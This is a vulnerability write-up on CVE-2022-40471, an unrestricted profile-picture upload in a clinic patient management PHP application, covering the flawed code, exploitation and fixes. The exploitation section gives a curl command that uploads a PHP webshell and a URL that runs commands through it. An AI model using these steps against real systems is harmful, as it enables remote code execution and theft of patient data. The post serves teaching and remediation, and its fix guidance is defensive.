In 2022 a critical vulnerability, CVE-2022-40471, was published for Clinic's Patient Management System v1.0. The profile picture upload in users.php accepts arbitrary files, so any user who can reach that form can upload a PHP file such as a webshell in place of an image. In simple terms: an attacker who disguises a script as a profile picture gains code execution on the server.

This post walks through what the vulnerability is, how it works, how it is exploited, and how to fix or prevent it. It is written for educational purposes only.

What is Clinic's Patient Management System?

It is a web-based, open-source PHP application used by small clinics to manage patients, appointments and other administrative tasks. Like many small projects, it lacks strong security checks in places, and file upload handling is one of them.

- Official CVE details: CVE-2022-40471
- GitHub Advisory Database entry
- Packet Storm advisory

The Issue

The profile picture upload in users.php does not validate or restrict the file type, the file extension, or the actual file contents. An attacker can therefore submit a .php file containing malicious code in place of a real image.

Worse, the server keeps the original file name and saves the upload into a web-accessible directory, so the attacker can simply request the file afterwards and the web server executes it as PHP.

Affected Code (Typical Snippet)

Below is a simplified reconstruction, based on public sources, of how the upload is handled inside users.php. Note what is missing: there is no check on the extension, the MIME type or the contents, and the client-supplied name is reused verbatim.

if (isset($_FILES['profile_pic'])) {
    // User-controlled name is reused as-is: no extension or content check,
    // so a file named shell.php is stored as uploads/shell.php.
    $filename = $_FILES['profile_pic']['name'];
    $filepath = "uploads/" . $filename;   // web-accessible directory
    move_uploaded_file($_FILES['profile_pic']['tmp_name'], $filepath);
}

Exploiting It

Log in with any account that can reach the profile picture form and upload a minimal webshell (a one-line PHP file that passes the cmd query parameter to system()) in place of an image. The upload can be automated with curl; the form field name profile_pic and the paths below are illustrative, so check the actual form, and pass your session cookie so the request is authenticated (the PHPSESSID value is a placeholder):

curl -b "PHPSESSID=<your session id>" -F "profile_pic=@shell.php" http://target-site/users.php

Because the file keeps its original name and lands in a web-accessible directory, it can then be executed straight from the browser:

http://target-site/uploads/shell.php?cmd=id

Result: the output of the id command appears in the browser, showing the commands run as the web server user (typically www-data or apache).

Why Is This Dangerous?

- Full Remote Code Execution: the attacker runs commands with the privileges of the web server user, and from there can read the patient database, change passwords, drop further tooling, and pivot into the internal network.

How to Fix or Prevent It

- Validate the content, not the name: check the real MIME type (mime_content_type or finfo) and that the file actually parses as an image (getimagesize). The client-supplied Content-Type and extension are attacker-controlled and prove nothing.

- Never reuse the uploaded file name: store the file under a server-generated name with an extension chosen from the detected image type, so a .php name can never reach the disk.

- Check file contents for PHP tags: basic scanning for <?php or <?= catches obvious payloads, but it is a backstop only. A file that starts with a valid image header and carries PHP further in passes a MIME check, so this must be combined with the controls above.

- Disable execution for upload directories: configure the web server so that nothing under uploads/ is ever handed to the PHP interpreter (for example, deny .php files in that directory, or store uploads outside the web root and serve them through a script). Then even a file that slips through is served as inert bytes instead of being executed.

Example Improved PHP Handling

// Map accepted MIME types to the extension that will actually be stored.
$allowed_types = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];
$tmp = $_FILES['profile_pic']['tmp_name'];

// Inspect the real content; never trust the client's type or file name.
$filetype = mime_content_type($tmp);

if (isset($allowed_types[$filetype]) && getimagesize($tmp) !== false) {
    // Server-generated name plus a fixed extension derived from the detected type,
    // so a PHP file with a forged image header cannot keep its .php extension.
    $newname = bin2hex(random_bytes(16)) . '.' . $allowed_types[$filetype];
    move_uploaded_file($tmp, __DIR__ . '/uploads/' . $newname);
} else {
    echo "Invalid file type!";
}

Final Thoughts

CVE-2022-40471 is a textbook example of why file upload handling needs strict controls. Out of the box, Clinic's Patient Management System v1.0 turns a profile picture form into trivial remote code execution.

If you use or manage this system, update or patch it and add the file handling restrictions described above immediately.

Please use this knowledge responsibly. For more details, see the original CVE description and the advisories linked above.

Timeline

Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 17:00:00 UTC